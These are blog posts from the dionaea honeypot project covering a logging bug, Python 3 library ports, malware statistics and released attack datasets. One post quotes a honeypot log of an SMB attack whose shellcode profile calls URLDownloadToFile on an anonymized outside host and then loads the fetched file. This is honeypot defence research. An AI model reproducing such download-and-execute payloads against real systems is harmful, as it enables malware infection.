Even though I've spent some time on dionaea lately, I did not commit much of it yet, so here is a short heads up.
The 26c3 came to an end yesterday, the year is coming to an end today, but there is still some time left to prepare tomorrows sober, for example downloading videos of the talks held at the 26c3, some videos I'd recommend:
There will be other videos, which would be worth your time, but I won't recommend things I did not see myself, and may update the list later at some point. Here is the schedule, here are the appropriate files (not all talks have been uploaded as of yet).
Happy new year,
Markus
dionaea is meant to support SIGHUP, allowing you to rotate logfiles without restarting the service.
Basically it works, but I got noticed there things were going wrong after SIGHUP, events would appear multiple times in the sql logging.
For example you'd have multiple downloads of the same file for a single event.
connection 1828337 smbd tcp accept a.b.c.d:445 <- w.x.y.z:4029
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' opnum 31
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
offer: http://w.x.y.z:4344/mfbjb
offer: http://w.x.y.z:4344/mfbjb
offer: http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
download: 87136c488903474630369e232704fa4d http://w.x.y.z:4344/mfbjb
profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://w.x.y.z:4344/mfbjb', 'x.', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '0x00000000', 'args': ['x.'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
The offer was logged 3 times, the download 6 times.
The magic port was meant as a warmup, the idea was porting pycurl.
It is done, and works for me.
You can grab the diff here or from pycurl patch tracker.
UPDATE New version, which workarounds the bug mentioned.
To use:
cvs -d:pserver:anonymous@pycurl.cvs.sourceforge.net:/cvsroot/pycurl login cvs -z3 -d:pserver:anonymous@pycurl.cvs.sourceforge.net:/cvsroot/pycurl co -P pycurl wget -O /dev/stdout http://p.carnivore.it/wtnYp3?download | patch -p0 /opt/dionaea/bin/python3 setup.py install
I ported the binding, the setup.py and 2 examples, the share interface is untested.
I just ported python-magic to python3.
Of course, python got its very own mimetypes, but there are reasons to rely on libmagic.
If you want to use magic with python3:
aptitude install libmagic-dev apt-get source file wget http://p.carnivore.it/2v6Uwg?download -O /dev/stdout | patch -p1 cd file-5.03/python/ /opt/dionaea/bin/python3 setup.py install
Afterwards, useage is compatible to python2:
I'm sorry, but my english does not provide the required vocabularies to translate my mothers cookie recipe into english.
As promised, I uploaded virustotal results for *every* file the paris db.
The packed sql data has 600k, to use:
bunzip paris-20091207-missionpack_avs.sql.bz2 sqlite3 logsql.sqlite < paris-20091207-missionpack_avs.sql
I can recommend sqliteman to for playing with the database.
I hacked a script to retrieve the virustotal results for the files mentioned in the paris database, and store the results in the paris database so I could query them. Unfortunately dionaea does not submit to virustotal.com (yet), therefore there are signatures missing for 'some' (75%) files. Afterwards I designed a queries to retrieve some stats about different things.
As I was interested in the share of Conficker attacks, I decided to retrieve some numbers from the paris database.
As I don't know which files count as Conficker, I had to rely on av vendor signatures.
Andrew Waite downloaded the sqlite datasets and blogged about his results running his mimic-nepstats.py script, as I was surprised about the time it took for the paris dataset, I had to investigate. For me, the paris dataset took more than 30minutes, and I even rewrote some of the queries to make it faster, but he said it was done in about 3minutes. So, I gave it a shot, and he was right, it was even faster then the 3 minutes he claimed, I could to it in about ~2minutes.
The only difference I could figure out, my initial test did not use the anonymized database. I gave it a shot, and the not-anonymized database was rather sloppy compared to the anonymized db. The steps to create the anonymized db involved dumping the original db and restoring the dump to a new database.
Microsoft Malware Protection Center recently had a news about Do and don’ts for p@$$w0rd$, but they just released some statistics about the data gathered. Thats common, raw data is dangerous for the decoys, nobody wants to reveal his honeypots address, and raw data is pretty large.
But as current technology allows data compression, and we are confident our anonymization allows protecting decoy and attackers, we decided to release raw data.
We offer two sqlite databases 1),
Please let us know, if you post/blog about it, so we can link it here. A simple mail to nepenthesdev@gmail.com, or the still virgin #dionaea hashtag on twitter will do the trick.
Sure, just ask for it 1).
Some days ago an organization, which prefers to stay unnamed, asked whether I would accept funding, as a stimulus for the running projects. As the conditions were really generous, I accepted the honorable offer after short discussion with Felix, Mark, Paul and Tillmann.
This is great.
It was totally unexpected, as it was the first time a user asked to fund the projects, and I really appreciate it.
To me, the gesture multiplied the money's value.
I got the chance to present about the evolution of low-interaction honeypots including recent developments of dionaea at the FIRST Technical Colloqium in Kuala Lumpur, Malaysia.
Special thanks to MyCERT for inviting me over!
The presentation went well and as measured by feedback and questions was well received.
Check out the talk information page here.
The slides are also available: lowint-honeypots-mark-schloesser-2009-12-01.pdf
Mark
